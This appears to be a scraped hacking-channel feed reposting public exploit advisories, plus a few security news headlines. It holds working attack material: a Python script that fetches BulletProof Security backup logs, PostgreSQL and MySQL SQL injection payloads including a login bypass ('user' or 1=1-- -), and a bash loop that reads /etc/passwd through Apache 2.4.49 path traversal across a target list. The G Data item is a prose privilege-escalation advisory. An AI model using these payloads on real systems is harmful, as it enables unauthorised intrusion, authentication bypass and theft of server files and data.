Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
WordPress BulletProof Security 5.1 Information Disclosure
https://3.bp.blogspot.com/-D2NV3HnXxpM/WWlu9YoBNhI/AAAAAAAAIJs/rLrqFdeLLWYSGUQPyN0O7DuhnXu7T_FjQCLcBGAs/s1600/h114.png
WordPress BulletProof Security plugin version 5.1 suffers from an information disclosure vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
WordPress BulletProof Security 5.1 Information Disclosure
https://3.bp.blogspot.com/-D2NV3HnXxpM/WWlu9YoBNhI/AAAAAAAAIJs/rLrqFdeLLWYSGUQPyN0O7DuhnXu7T_FjQCLcBGAs/s1600/h114.png
WordPress BulletProof Security plugin version 5.1 suffers from an information disclosure vulnerability.
MD5 |
8921fb148d8d2f34f31511cf73eba22eDownload
# Exploit Title: Wordpress Plugin BulletProof Security 5.1 - Sensitive Information Disclosure
# Date 04.10.2021
# Exploit Author: Ron Jost (Hacker5preme)
# Vendor Homepage: https://forum.ait-pro.com/read-me-first/
# Software Link: https://downloads.wordpress.org/plugin/bulletproof-security.5.1.zip
# Version: <=
# Tested on: Ubuntu 18.04
# CVE: CVE-2021-39327
# CWE: CWE-200
# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-39327/README.md
'''
Description:
The BulletProof Security WordPress plugin is vulnerable to sensitive information disclosure due to a file path disclosure in the publicly accessible
~/db_backup_log.txt file which grants attackers the full path of the site, in addition to the path of database backup files.
This affects versions up to, and including, 5.1.
'''
'''
'Banner:
'''
banner = '''
______ _______ ____ ___ ____ _ _____ ___ _________ _____
/ ___\ \ / / ____| |___ \ / _ \___ \/ | |___ // _ \___ /___ \___ |
| | \ \ / /| _| _____ __) | | | |__) | |_____ |_ \ (_) ||_ \ __) | / /
| |___ \ V / | |__|_____/ __/| |_| / __/| |_____|__) \__, |__) / __/ / /
\____| \_/ |_____| |_____|\___/_____|_| |____/ /_/____/_____/_/
* Sensitive information disclosure
@ Author: Ron Jost
'''
print(banner)
import argparse
import requests
'''
User-Input:
'''
my_parser = argparse.ArgumentParser(description='Wordpress Plugin BulletProof Security - Sensitive information disclosure')
my_parser.add_argument('-T', '--IP', type=str)
my_parser.add_argument('-P', '--PORT', type=str)
my_parser.add_argument('-U', '--PATH', type=str)
args = my_parser.parse_args()
target_ip = args.IP
target_port = args.PORT
wp_path = args.PATH
print('')
print('[*] Starting Exploit:')
print('')
paths = ["/wp-content/bps-backup/logs/db_backup_log.txt", "/wp-content/plugins/bulletproof-security/admin/htaccess/db_backup_log.txt"]
# Exploit
for pathadd in paths:
x = requests.get("http://" + target_ip + ':' + target_port + '/' + wp_path + pathadd)
print(x.text)
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
WordPress BulletProof Security 5.1 Information Disclosure
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Odine Solutions GateKeeper 1.0 SQL Injection
https://4.bp.blogspot.com/-mbNmyGHywr4/WWlve-suujI/AAAAAAAAIP4/9elXOC6IHOcW_3VzQDLCix2bjP9zh38ZgCLcBGAs/s1600/h83.png
Odine Solutions GateKeeper version 1.0 suffers from a remote SQL injection vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Odine Solutions GateKeeper 1.0 SQL Injection
https://4.bp.blogspot.com/-mbNmyGHywr4/WWlve-suujI/AAAAAAAAIP4/9elXOC6IHOcW_3VzQDLCix2bjP9zh38ZgCLcBGAs/s1600/h83.png
Odine Solutions GateKeeper version 1.0 suffers from a remote SQL injection vulnerability.
MD5 |
e6c999b2b236d580398e8cb7ace126e7Download
# Exploit Title: Odine Solutions GateKeeper 1.0 - 'trafficCycle' SQL Injection
# Date: 05.10.2021
# Exploit Author: Emel Basayar
# Vendor: Odine Solutions - odinesolutions.com
# Vendor Homepage: https://odinesolutions.com/software/gatekeeper-simbox-antifraud/
# Version: 1.0
# Category: Webapps
# Tested on: Ubuntu 18 TLS
# Description : The vulnerability allows an attacker to inject sql commands from search section with 'trafficCycle' parameter.
# This vulnerability was discovered during the penetration testing and the vulnerability was fixed.
====================================================
# PoC : SQLi :
GET /rass/api/v1/trafficCycle/98 HTTP/1.1
Host: 192.168.1.25
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Authorization: Bearer xm38HruG-htx0jNuM-l9UBCkoz-G7RigZvx
Origin: https://192.168.1.25
Connection: close
Referer: https://192.168.1.25
Parameter: #1* (URI)
Type: error-based
Title: PostgreSQL AND error-based - WHERE or HAVING clause
Payload: https://192.168.1.25:443/rass/api/v1/trafficCycle/98' AND 5042=CAST((CHR(113)||CHR(118)||CHR(112)||CHR(118)||CHR(113))||(SELECT (CASE WHEN (5042=5042) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(118)||CHR(98)||CHR(120)||CHR(113)) AS NUMERIC)-- yrdB
Type: stacked queries
Title: PostgreSQL > 8.1 stacked queries (comment)
Payload: https://192.168.1.25:443/rass/api/v1/trafficCycle/98';SELECT PG_SLEEP(5)--
Type: time-based blind
Title: PostgreSQL > 8.1 AND time-based blind
Payload: https://192.168.1.25:443/rass/api/v1/trafficCycle/98' AND 9405=(SELECT 9405 FROM PG_SLEEP(5))-- PasC
---
web application technology: Nginx
back-end DBMS: PostgreSQL
====================================================
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Odine Solutions GateKeeper 1.0 SQL Injection
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
G Data EndpointProtection Enterprise 17.08.2021 Privilege Escalation
https://4.bp.blogspot.com/-42b-8Yu8ql4/WWlvfoDuyhI/AAAAAAAAIQE/GMGQD7Uo7DMncRccI_LNcWgfvYRkd0zwQCLcBGAs/s1600/h86.png
G Data EndpointProtection Enterprise version 17.08.2021 suffers from a privilege escalation vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
G Data EndpointProtection Enterprise 17.08.2021 Privilege Escalation
https://4.bp.blogspot.com/-42b-8Yu8ql4/WWlvfoDuyhI/AAAAAAAAIQE/GMGQD7Uo7DMncRccI_LNcWgfvYRkd0zwQCLcBGAs/s1600/h86.png
G Data EndpointProtection Enterprise version 17.08.2021 suffers from a privilege escalation vulnerability.
MD5 |
b7c6e369ca821f7e8d7aaa6fbda494eeDownload
DATA Anti-Virus: Abusing OpenSSL to get local admin
Metadata
===================================================
Release Date: 05-Oct-2021
Author: Florian Bogner @ https://bee-itsecurity.at
Affected product: G Data’s Security Client “EndpointProtection Enterprise”
Fixed in: all versions after 17.08.2021
Tested on: Windows 10 x64 fully patched
URL: https://bogner.sh/2021/10/g-data-anti-virus-abusing-openssl-to-get-local-admin/
Vulnerability Status: Fixed with new release
Product Description
===================================================
The most sensitive areas of your systems are your employees’ workstations. Where attachments are opened, passwords are entered, and sensitive data is processed. The servers that make connections across the entire network. And smartphones that come and go with your employees every day. This is precisely where our endpoint security solutions protect your company assets. [https://www.gdata-software.com/business/endpoint-security]
Vulnerability Description
===================================================
The underlying problem was, that the GdAgentSrv (which is running as SYSTEM) tried to load its OpenSSL configuration from the non-existing path C:\Jenkins\vcpkg-master\packages\openssl-windows_x86-141-static\openssl.cnf (newer versions load from C:\Jenkins\vcpkg-master\packages\openssl-windows_x86-static\openssl.cnf). This can be abused by any local user to load arbitrary libraries (DLLs) and execute untrusted code in the affected process. This leads to a privilege escalation from non-admin user to SYSTEM.
For more information please visit: https://bogner.sh/2021/10/g-data-anti-virus-abusing-openssl-to-get-local-admin/
Suggested Solution
===================================================
Users should update to the latest available version.
Disclosure Timeline
===================================================
10.10.2019: The issue has been identified, documented and reported (ticket number CAS-730826-F7K4R9). No reply received.
11.2020: The issue was communicated again to G Data’s Sales Team in Austria. After initial communication no further feedback.
06.2021: The issues was abused during a security check to overtake another client’s infrastructure.
14.06.2021: G DATA confirms the vulnerability. Public disclosure is planed for 15th September 2021
17.08.2021: Fixed version is released to the public
05.10.2021: Public disclosure
___________
Florian Bogner
Information Security Expert, Speaker
Bee IT Security Consulting GmbH
Nibelungenstraße 37
3123 A-Schweinern
Tel: +43 660 123 9 454
Mail: florian.bogner@bee-itsecurity.at
Web: https://www.bee-itsecurity.at
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
G Data EndpointProtection Enterprise 17.08.2021 Privilege Escalation
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Exploit Collector
High Infinity Technology HiKam S6 1.3.26 Spoofing / Broken Authentication
___________________________
@hacking_Attack
@Hacking_Video
High Infinity Technology HiKam S6 1.3.26 Spoofing / Broken Authentication
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
High Infinity Technology HiKam S6 1.3.26 Spoofing / Broken Authentication
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Talariax sendQuick Alertplus 4.3 SQL Injection
https://2.bp.blogspot.com/-3bqdQy169Lk/WWlvCV-tQiI/AAAAAAAAIKk/BK-Yk_ldGYEd1hCc6yCV2jCLaxiytL8_wCLcBGAs/s1600/h127.png
Talariax sendQuick Alertplus server admin version 4.3 suffers from a remote SQL injection vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Talariax sendQuick Alertplus 4.3 SQL Injection
https://2.bp.blogspot.com/-3bqdQy169Lk/WWlvCV-tQiI/AAAAAAAAIKk/BK-Yk_ldGYEd1hCc6yCV2jCLaxiytL8_wCLcBGAs/s1600/h127.png
Talariax sendQuick Alertplus server admin version 4.3 suffers from a remote SQL injection vulnerability.
MD5 |
f8a6239dc00f0239591cfaa64edc9f96Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Talariax sendQuick Alertplus 4.3 SQL Injection
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Online-Food-Ordering-Web-App SQL Injection
https://1.bp.blogspot.com/-HlvbbOwsdTc/WWlvV_wSsQI/AAAAAAAAIOA/psrlTyexNtUDdre2JEY7YvqsGP1V8LJKQCLcBGAs/s1600/h47.png
Online-Food-Ordering-Web-App suffers from a remote SQL injection vulnerability that allows for authentication bypass.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Online-Food-Ordering-Web-App SQL Injection
https://1.bp.blogspot.com/-HlvbbOwsdTc/WWlvV_wSsQI/AAAAAAAAIOA/psrlTyexNtUDdre2JEY7YvqsGP1V8LJKQCLcBGAs/s1600/h47.png
Online-Food-Ordering-Web-App suffers from a remote SQL injection vulnerability that allows for authentication bypass.
MD5 |
2e3935af30a88b048926ba5e206dad5aDownload
CVE-2021-41647 SQL Injection in Online-Food-Ordering-Web-App
The Online-Food-Ordering-Web-App is vulnerable to un-authenticated error and time-based blind SQL Injection attacks. The username parameter on the /login.php page does not sanitize the user input, an attacker is able to bypass the login using a simple bypass technique.
Link To Application
Online-Food-Ordering-Web-App
Affected Components & Parameter
URL: /login.php
PARAMETER: username
POC'S
LOGIN BYPASS PAYLOAD
To bypass the user login and gain full administrative access, payload in the username input field: user' or 1=1-- -
SQLMAP PAYLOADS
Parameter: username (POST Request) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: username=test'||(SELECT 0x6d65686d WHERE 8694=8694 AND (SELECT 8639 FROM(SELECT COUNT(*),CONCAT(0x71626a7a71,(SELECT (ELT(8639=8639,1))),0x71766a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'&password=asdfasdrf
Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=test'||(SELECT 0x6d6d6367 WHERE 7580=7580 AND (SELECT 4416 FROM (SELECT(SLEEP(5)))nUhT))||'&password=asdfasdrf
Discovered by
Jason Colyvas
MOBIUSBINARY
September 20th, 2021
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Online-Food-Ordering-Web-App SQL Injection
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Apache HTTP Server 2.4.49 Path Traversal
https://2.bp.blogspot.com/-QZ2Sf2sxziM/WWlvZhEG73I/AAAAAAAAIO0/d0s8s4TXkHwnfXzbpubNEBqDxa568NQgwCLcBGAs/s1600/h60.png
Apache HTTP Server version 2.4.49 suffers from a path traversal vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Apache HTTP Server 2.4.49 Path Traversal
https://2.bp.blogspot.com/-QZ2Sf2sxziM/WWlvZhEG73I/AAAAAAAAIO0/d0s8s4TXkHwnfXzbpubNEBqDxa568NQgwCLcBGAs/s1600/h60.png
Apache HTTP Server version 2.4.49 suffers from a path traversal vulnerability.
MD5 |
1f8f44361142a2acbf7b9f53b654f29aDownload
# Exploit Title: Apache HTTP Server 2.4.49 - Path Traversal
# Date: 10/05/2021
# Exploit Author: Lucas Souza https://lsass.io
# Vendor Homepage: https://apache.org/
# Version: 2.4.49
# Tested on: 2.4.49
# CVE : CVE-2021-41773
# Credits: Ash Daulton and the cPanel Security Team
#!/bin/bash
if [[ $1 =3D=3D '' ]]; [[ $2 =3D=3D '' ]]; then
echo Set [TAGET-LIST.TXT] [PATH]
echo ./PoC.sh targets.txt /etc/passwd
exit
fi
for host in $(cat $1); do
curl --silent --path-as-is --insecure "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"; done
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Apache HTTP Server 2.4.49 Path Traversal
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Reverse engineering and decrypting CyberArk vault credential files
https://www.reddit.com/r/redteamsec/comments/q2p3y6/reverse_engineering_and_decrypting_cyberark_vault/
submitted by /u/dmchell (https://www.reddit.com/user/dmchell)
[link] (https://jellevergeer.com/reverse-engineering-and-decrypting-cyberark-vault-credential-files/) [comments] (https://www.reddit.com/r/redteamsec/comments/q2p3y6/reverse_engineering_and_decrypting_cyberark_vault/)
___________________________
@hacking_Attack
@Hacking_Video
https://www.reddit.com/r/redteamsec/comments/q2p3y6/reverse_engineering_and_decrypting_cyberark_vault/
submitted by /u/dmchell (https://www.reddit.com/user/dmchell)
[link] (https://jellevergeer.com/reverse-engineering-and-decrypting-cyberark-vault-credential-files/) [comments] (https://www.reddit.com/r/redteamsec/comments/q2p3y6/reverse_engineering_and_decrypting_cyberark_vault/)
___________________________
@hacking_Attack
@Hacking_Video
reddit
Reverse engineering and decrypting CyberArk vault credential files
Posted in r/redteamsec by u/dmchell • 2 points and 0 comments
Dark Reading: Attacks/Breaches
Optiv Rebrands as Cyber Advisory & Solutions Leader
Optiv announced it will create a new market category to protect business value and accelerate performance.
___________________________
@hacking_Attack
@Hacking_Video
Optiv Rebrands as Cyber Advisory & Solutions Leader
Optiv announced it will create a new market category to protect business value and accelerate performance.
___________________________
@hacking_Attack
@Hacking_Video
Dark Reading
Optiv Rebrands as Cyber Advisory & Solutions Leader
Optiv announced it will create a new market category to protect business value and accelerate performance.
Dark Reading: Attacks/Breaches
Why Not Sharing Is Caring When It Comes to Cybersecurity
Three key tips to help ensure your employees keep vital information safe.
___________________________
@hacking_Attack
@Hacking_Video
Why Not Sharing Is Caring When It Comes to Cybersecurity
Three key tips to help ensure your employees keep vital information safe.
___________________________
@hacking_Attack
@Hacking_Video
Dark Reading
Why Not Sharing Is Caring When It Comes to Cybersecurity
Three key tips to help ensure your employees keep vital information safe.
Dark Reading: Attacks/Breaches
Amazon's Twitch Streaming Service Hacked, Sensitive Data Leaked
Attackers claim to have dumped Twitch source code, payment information, and unreleased gaming product plan online.
___________________________
@hacking_Attack
@Hacking_Video
Amazon's Twitch Streaming Service Hacked, Sensitive Data Leaked
Attackers claim to have dumped Twitch source code, payment information, and unreleased gaming product plan online.
___________________________
@hacking_Attack
@Hacking_Video
Dark Reading
Amazon's Twitch Streaming Service Hacked, Sensitive Data Leaked
Attackers claim to have dumped Twitch source code, payment information, and unreleased gaming product plan online.
The #1 Cybersecurity Course on Udemy (2021)
https://www.reddit.com/r/Pentesting/comments/q2nra9/the_1_cybersecurity_course_on_udemy_2021/
___________________________
@hacking_Attack
@Hacking_Video
https://www.reddit.com/r/Pentesting/comments/q2nra9/the_1_cybersecurity_course_on_udemy_2021/
___________________________
@hacking_Attack
@Hacking_Video
reddit
The #1 Cybersecurity Course on Udemy (2021)
Posted in r/Pentesting by u/Jan_Prince • 0 points and 1 comment